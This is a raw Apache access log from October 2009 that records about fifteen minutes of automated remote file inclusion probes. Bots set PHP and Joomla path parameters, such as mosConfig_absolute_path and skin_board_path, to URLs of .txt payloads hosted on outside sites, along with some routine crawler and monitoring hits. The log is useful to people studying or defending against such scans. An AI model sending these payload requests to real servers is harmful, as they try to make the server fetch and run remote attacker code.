69.162.74.91 - - [06/Oct/2009:00:46:58 -0400] "GET /logs/error_log.Q109072900//main.php?sayfa=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:47:04 -0400] "GET /logs/access_log.Q109090600%20%20/=&_REQUEST[option]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:47:07 -0400] "GET /logs/access_log.Q109090600%20%20/=&_REQUEST[option]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:47:17 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:47:30 -0400] "GET /logs/access_log.Q109091300%20%20/=&_REQUEST[option]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:47:33 -0400] "GET /logs/access_log.Q109091300%20%20/=&_REQUEST[option]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:47:35 -0400] "GET /?sourcedir=http://www.meililai.co.kr/bbs//zfxid1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:47:35 -0400] "GET /logs/access_log.Q109063000%20%20/?sourcedir=http://www.meililai.co.kr/bbs//zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:47:35 -0400] "GET /logs/?sourcedir=http://www.meililai.co.kr/bbs//zfxid1.txt?? HTTP/1.1" 200 20714 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:47:37 -0400] "GET /logs/error_log.Q109072900//main.php?sayfa=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:48:02 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.meililai.co.kr/bbs//zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:00:48:43 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:49:34 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:49:34 -0400] "GET /logs/access_log.Q109061800//agendax/addevent.inc.php?agendax_path=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:49:34 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:49:38 -0400] "GET /logs/access_log.Q109081900//agendax/addevent.inc.php?agendax_path=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:49:40 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
117.102.204.130 - - [06/Oct/2009:00:49:42 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
117.102.204.130 - - [06/Oct/2009:00:49:42 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
117.102.204.130 - - [06/Oct/2009:00:49:42 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
117.102.204.130 - - [06/Oct/2009:00:49:44 -0400] "GET /logs/error_log.Q109052800///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
117.102.204.130 - - [06/Oct/2009:00:49:44 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
117.102.204.130 - - [06/Oct/2009:00:49:44 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:49:46 -0400] "GET /index.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:49:46 -0400] "GET /logs/index.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:49:46 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:49:51 -0400] "GET /logs/access_log.Q109081300/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:00:50:02 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
174.143.3.188 - - [06/Oct/2009:00:50:02 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.143.3.188 - - [06/Oct/2009:00:50:02 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
174.143.3.188 - - [06/Oct/2009:00:50:02 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
117.102.204.130 - - [06/Oct/2009:00:50:14 -0400] "GET /logs/access_log.Q109083100%20%20///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
117.102.204.130 - - [06/Oct/2009:00:50:14 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
117.102.204.130 - - [06/Oct/2009:00:50:14 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
117.102.204.130 - - [06/Oct/2009:00:50:26 -0400] "GET /logs/access_log.Q109091000%20%20///include/mail.inc.php?skin_board_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:50:39 -0400] "GET /logs/access_log.Q109070900%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:51:01 -0400] "GET /logs/access_log.Q109061800%20%20//agendax/addevent.inc.php?agendax_path=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:00:51:08 -0400] "GET /logs/error_log.Q109092000%20%20/index.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:00:51:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.242.37.212 - - [06/Oct/2009:00:51:22 -0400] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:51:22 -0400] "GET /logs//main.php?sayfa=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:51:22 -0400] "GET /logs/access_log.Q109081900%20%20//agendax/addevent.inc.php?agendax_path=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:51:25 -0400] "GET //main.php?sayfa=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:51:40 -0400] "GET /logs/error_log.Q109072900%20%20//main.php?sayfa=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.232.167.73 - - [06/Oct/2009:00:51:56 -0400] "GET /index.php?seite=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
72.232.167.73 - - [06/Oct/2009:00:51:56 -0400] "GET /logs/index.php?seite=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
222.236.47.23 - - [06/Oct/2009:00:52:24 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:00:52:24 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:00:52:24 -0400] "GET /logs/access_log.Q109080800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:00:52:28 -0400] "GET /logs/access_log.Q109090600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.55.207.120 - - [06/Oct/2009:00:52:45 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.242.37.212 - - [06/Oct/2009:00:53:16 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:53:21 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:53:21 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:53:32 -0400] "GET /logs/access_log.Q109092000%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
65.55.207.120 - - [06/Oct/2009:00:53:52 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.125.237.35 - - [06/Oct/2009:00:53:56 -0400] "GET /.ru//?_SERVER[DOCUMENT_ROOT]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:53:56 -0400] "GET /logs/.ru//?_SERVER[DOCUMENT_ROOT]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:53:56 -0400] "GET /logs/access_log.Q109062900/.ru//?_SERVER[DOCUMENT_ROOT]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:54:07 -0400] "GET /logs/access_log.Q109090300//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:54:07 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:54:07 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:54:42 -0400] "GET /logs/access_log.Q109062900/.ru//?_SERVER[DOCUMENT_ROOT]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:54:42 -0400] "GET /logs/.ru//?_SERVER[DOCUMENT_ROOT]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:54:42 -0400] "GET /.ru//?_SERVER[DOCUMENT_ROOT]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:55:00 -0400] "GET /logs/error_log.Q109062900/.ru//?_SERVER[DOCUMENT_ROOT]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:55:56 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:55:56 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:55:56 -0400] "GET /logs/access_log.Q109083100%20%20//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:56:07 -0400] "GET /mail.inc.php?skin_board_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:56:07 -0400] "GET /logs/mail.inc.php?skin_board_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:56:07 -0400] "GET /logs/access_log.Q109072200/mail.inc.php?skin_board_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:00:56:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.9.225.71 - - [06/Oct/2009:00:56:16 -0400] "GET /logs/access_log.Q109091000%20%20//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:56:33 -0400] "GET /mail.inc.php?skin_board_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:56:33 -0400] "GET /logs/mail.inc.php?skin_board_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:56:33 -0400] "GET /logs/access_log.Q109072200/mail.inc.php?skin_board_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:56:53 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:56:53 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:56:53 -0400] "GET /logs/access_log.Q109061800//agendax/addevent.inc.php?agendax_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:56:57 -0400] "GET /logs/access_log.Q109081900//agendax/addevent.inc.php?agendax_path=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.139.66.104 - - [06/Oct/2009:00:57:03 -0400] "GET ///index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
87.139.66.104 - - [06/Oct/2009:00:57:03 -0400] "GET /logs///index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 262 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
222.236.47.23 - - [06/Oct/2009:00:57:06 -0400] "GET /logs/access_log.Q109082800%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:00:57:06 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:00:57:06 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:57:28 -0400] "GET /logs/access_log.Q109071100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:57:35 -0400] "GET /logs/access_log.Q109092200/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:57:44 -0400] "GET /error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:57:44 -0400] "GET /logs/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:57:44 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:57:44 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:58:04 -0400] "GET /logs/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:58:04 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:58:04 -0400] "GET /error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:58:11 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.205.6.233 - - [06/Oct/2009:00:58:36 -0400] "GET ///error.php?dir=http://banlat.ac.th/22.jpg??%0D?? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
210.205.6.233 - - [06/Oct/2009:00:58:36 -0400] "GET /logs/access_log.Q109081700///error.php?dir=http://banlat.ac.th/22.jpg??%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
210.205.6.233 - - [06/Oct/2009:00:58:36 -0400] "GET /logs///error.php?dir=http://banlat.ac.th/22.jpg??%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
210.205.6.233 - - [06/Oct/2009:00:58:36 -0400] "GET /logs/access_log.Q109070800///error.php?dir=http://banlat.ac.th/22.jpg??%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
195.186.64.229 - - [06/Oct/2009:00:59:18 -0400] "GET //include/mail.inc.php?skin_board_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:59:18 -0400] "GET /logs/access_log.Q109090900%20%20//include/mail.inc.php?skin_board_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 248 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:59:18 -0400] "GET /logs/access_log.Q109070300%20%20//include/mail.inc.php?skin_board_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 248 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:59:19 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 224 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:59:37 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:59:37 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:59:38 -0400] "GET /logs/access_log.Q109083100%20%20//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:00:59:52 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:00:59:52 -0400] "GET /logs/error_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:00:59:52 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:59:54 -0400] "GET /logs/access_log.Q109091000%20%20//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:00:02 -0400] "GET /logs/access_log.Q109062900%20%20/.ru//?_SERVER[DOCUMENT_ROOT]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:01:00:03 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
174.143.3.188 - - [06/Oct/2009:01:00:03 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
174.143.3.188 - - [06/Oct/2009:01:00:03 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
174.143.3.188 - - [06/Oct/2009:01:00:03 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Microsoft Pocket Internet Explorer/0.6"
81.222.131.98 - - [06/Oct/2009:01:00:21 -0400] "GET /logs/access_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:00:43 -0400] "GET /logs/access_log.Q109062900%20%20/.ru//?_SERVER[DOCUMENT_ROOT]=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.62.196.11 - - [06/Oct/2009:01:00:44 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Oct/2009:01:00:54 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Oct/2009:01:00:54 -0400] "GET /logs/error_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Oct/2009:01:00:54 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
